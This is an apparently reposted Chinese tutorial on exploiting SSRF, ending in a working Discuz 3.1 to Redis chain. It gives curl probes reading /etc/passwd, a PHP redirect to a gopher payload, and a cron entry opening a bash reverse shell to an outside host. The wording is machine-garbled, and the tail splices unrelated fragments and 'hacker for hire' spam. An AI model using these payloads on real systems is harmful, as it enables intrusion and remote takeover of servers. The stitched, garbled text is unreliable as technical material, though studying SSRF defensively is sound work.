作者：WHITE

文章来历：Ms08067安全试验室

什么是SSRF？

SSRF（Server-Side Request Forgery，服务器端央求假造）是一种由侵犯者结构央求，运用服务器端主张的安全缝隙。一般情况下，SSRF侵犯的方针是外网无法拜访的内部系统（正由于央求是由服务器端主张的，所以服务器能央求到与本身相连而外网阻隔的内部系统）。

Example：

GET /index.php?url=http://google.com/ HTTP/1.1

Host: example.com

在这儿，http://example.com从它的服务器获取http://google.com

目录

0X00 SSRF的类型

0X01 什么当地最简略呈现SSRF

0X02 SSRF缝隙的损害

0X03 SSRF神器Curl的运用

0X04 最常用的跳转绕过

 0X05 Python+SSRF完结端口扫描

0X06 运用Discuz的SSRF缝隙GetShell

0X07 简略的绕过SSRF图片的约束

0X08 或许遇到的问题

0X09 常用发掘SSRF缝隙的东西

0X00 SSRF的类型

1. 显现侵犯者的呼应（Basic）

2. 不显现呼应（Blind）

0X01 什么当地最简略呈现SSRF

云服务器商。(各种网站数据库操作)

有远程图片加载的当地。(编辑器之类的有远程图片加载啊)

网站收集、网页抓取的当地。(许多网站会有新闻收集输入url然后一键收集)

头像的当地。(某易就喜爱远程加载头像，例如:https://www.xxxx.com/image?url=https://www.hack56.com/images/rtau1jeroci.jpg)

终究一个全部要你输入网址的当地和可以输入ip的都放，都是ssrf的全国。

0X02 SSRF缝隙的损害

对服务器地点的内网进行端口扫描，获取一些服务的banner信息等

侵犯工作在内网或许本地的运用程序

对内网WEB运用进行指纹识别，通过拜访默许文件完结（Readme等文件）

侵犯内外网的WEB运用，首要是GET就可以完结的侵犯（比方Struts2，SQL注入等）

下载内网资源（运用file协议读取本地文件等）

运用Redis未授权拜访，HTTP CRLF注入到达getshell

wooyun峰会猪猪侠的ppt

进行跳板

无视cdn

0X03 SSRF神器Curl的运用

检查curl支撑的协议列表 #curl--config –protocols

运用curl读取文件

curl -v file:///etc/passwd

运用ftp协议

curl -v "ftp://127.0.0.1:6666/info"

运用dict协议

curl -v "dict://127.0.0.1:6666/info"

运用gopher协议

curl -v "gopher://127.0.0.1:6666/_info"

0X04最常用的跳转绕过

0X05 Python+SSRF完结端口扫描

简略的端口扫描

一同调查Wireshark整个扫描流程

代码完结：

验证本地是否敞开了相应的端口

Python代码编写的思路：

端口存在衔接会一直在衔接，衔接时间会很长。

端口不存在的衔接会被立马改写

0X06 运用Discuz的SSRF缝隙GetShell

Discuz无条件约束ssrf缝隙（<=3.1测验是有这个缝隙）

试验环境：

172.28.100.109 为Discuz 3.1(Win10)，172.28.100.108为Redis服务器（CentOS），hacker.xxxx.com为公网$ ls /usr/src/linux-source-4.15.0.tar.bz2测验服务器首要寄存ssrf用的php文件

Discuz3.1下载地址：

http://www.comsenz.com/downloads/install/discuzx#down_open

示例：

/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ctf1ogvfg3k.jpg[/img]

实际运用payload：

http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ *** 4ousago2q.jpg[/img]

运用nc来测验SSRF缝隙

http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]

tcpdump抓包看到Discuz发来的数据包

nc也有反响了

根本可以供认这儿是有SSRF缝隙

运用header 来合作ssrf缝隙运用，在我公网服务器放了一个ssrf.php

<?php

header("Location: ftp://172.28.100.108:6666/info");

?>

这儿我是通过传参的 *** ，便利测验时分修正参数，代码如下：

PAYLOAD：

http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ *** 4ousago2q.jpg[/img]

相同nc也承受到了数据，测验时分发现ftp协议比http要快一些

KALI机器翻开socat端口转发（-v参数可以将转发进程的日志记载打印出来）

socat -v tcp-listen:6666,fork tcp-connect:172.28.100.108:6379

衔接SSRF脚本  

#留意centos和ubuntu系统的计划任务有些不一样，centos默许在/var/spool/cron/root，ubuntu默许是在/etc/crontab

履行成功    

#第四步能履行成功的条件有必要方针目录有写权限

到redis服务器的上检查/var/spool/cron目录下现已创建了root文件内容为*/1 * * * * bash -i >&/dev/tcp/hacker.xxxx.com/9999 0>&1

将socat的输出信息保存为1.txt，上传到公网服务器上

运用Python脚本转换为gopher支撑的格式

 

留意终究要检查一下格式是否无缺：*/1 * * * * bash -i >& /dev/tcp/hacker.xxx.com/99990>&1

新建gohper.php文件放到我自己的云服务器的网站根目录上，当Discuz拜访gohper.php文件时分就会跳转302跳转运用gohper协议拜访内部redis服务器

标准格式示例：

<?php

header("Location:gopher://172.28.100.108:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/hacker.xxxx.com/9999 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a%0a");

?>

方针机器SSRF缝隙的运用

进程中运用Wireshark抓包调查进程

方针redis服务器上发现计划任务现已收效了，假如这儿有乱码，请翻倒文章底部有处理方案

方针Redis的shell现已发给我的服务器了

0X07 简略的绕过SSRF图片的约束

Apache装备/etc/apache2/sites-enabled/，新建一个apache的装备文件123.conf

AddHandler application/x-httpd-php .php

这样apache就会把jpg也当作php解析；假如我们遇到约束了jpg后缀的ssrf缝隙就可以运用该 *** ，同理假如约束了txt的话。我们在apache设置把txt当作php解析即可。

将文件名命名为1.php.jpg即可拜访

也可以这样写AddHandler application/x-httpd-php .jpg

0X08 或许遇到的问题

以下问题是由于我用的linux上vim编辑器导致的，后运用Sublime编辑器处理了乱码问题

0X09 常用发掘SSRF缝隙的东西

运用F12，检查网站的 *** 央求

 

 

运用GoogleHacking,如site:www.baidu.com，然后查找网站是否有关于url的远程调用

 

 

黑客高手接单:SSRF缝隙使用 Getshell实战

通过cc服务器结束的一系列 *** ，选中的函数的功用是获取windows的powershell：def dump_cred *** an_generic():SSRF漏洞利用 Getshell实战

黑客高手接单“工欲善其事，必先利其器”，在正式初步，先来讲讲固件分析环境的建立，首要就是binwalk的设备。由于固件紧缩打包的 *** 有许多种，单用apt instll binwalk这条指令设备，许多文件系统的格式是不支撑解压的，需求将各种解压插件一同设备，才华正确解压出固件中的文件系统。无缺设备可参看binwalk的官方设备文档。但每次都要这样手动设备，笔者觉得很费事，因此写了设备脚本自动结束设备。 一、布景BillGates恶意软件针对工作中的linux服务器，其首要目的是感染服务器，将它们衔接在一个通过中心 C & C服务器控制的僵尸 *** 中，指示机器人在方针上主张 DDoS 侵犯。根据 Akamai 的安全情报研究小组 (SIRT)，现在黑客的装备已从比较旧的XOR DDoS 僵尸 *** 装备现已切换到 BillGates 僵尸网路。

Nmap done: 1 IP address (1 host up) scanned in 33.81 seconds然后运用网易有道云笔记的文件同享功用来进一步下载木马，可以看到该地址上寄存了许多的木马。1. LPD信息收集黑客高手接单

丰盛的编程阅历 但是这儿的 Lua 默许是工作在 Sandbox 里，许多标准的 Lua modules 和 functions 都被阻止了绕过证书确认其间，回调函数Url_parser只处理两种央求，分别为：

@rootkey = N'HKEY_LOCAL_MACHINE', 其他用户：未曾掌控资源的其他用户；other, o 与其他仿照器比较，Metasploit Vulnerable ServicesEmulator轻量细巧显然是其特征之一。Metasploit 2压缩包需求873M，要建立Metasploitable3需求65G的磁盘空间和4.5G的RAM，而Metasploit Vulnerable Services Emulator压缩包只需16K，由于无需虚拟机，这款仿照器对内存也没有具体要求。

[1][2]黑客接单网

4. Avr libc是一个开源项目，针对atmel厂商的各种微控制器开发C言语库、编译器、烧录东西等一系列辅佐东西，还有针对Windows途径的WinAvr项目。Arduino ide的中心其实也是avr libc。SSRF漏洞利用 Getshell实战

黑客高手接单影响和风险运用电磁波作为隐蔽信道传输数据或许是最早被研讨的 *** 。Kuhn和Anderson在其前期作业中研讨了运用显卡宣告的电磁波来泄露数据的 *** 。G *** em,Funthenna和Savat技术介绍了侵犯者可以运用电脑主板宣告的各种电磁辐射作为泄露数据的隐蔽信道。Loughry和Umphress研讨了运用键盘LED等宣告的光来结束数据盗取。Shaamir等人演示了怎样运用远程激光和扫描仪建立隐蔽信道的 *** 。BitWhisper技术更是通过热量来完结信息的传输。所以，今天我要介绍给你一些更好的暗码处理器，它们可在 Windows、Mac、Linux、Android、iOS 和企业中运用。2. 现在互联网上的信息很多，这些对错名单是否值得信任？

　　初探内网的环境是这样的

为了VPS的安全，总结一下几个要害的进程：

echo "文件名：".$_FILES['upfile']['name']."";黑客高手接单

回车供认等候一小会就ok了。终究，我们从头再翻开服务器即可工作。部分功用如下图drwxr-xr-x 2 root root 4096 Sep 9 03:13 20140909$ vi ~/.mutt/passwordSSRF漏洞利用 Getshell实战

require 'base64'V. CVE-2015-5122再起波澜

本文标题:黑客高手接单:SSRF缝隙使用 Getshell实战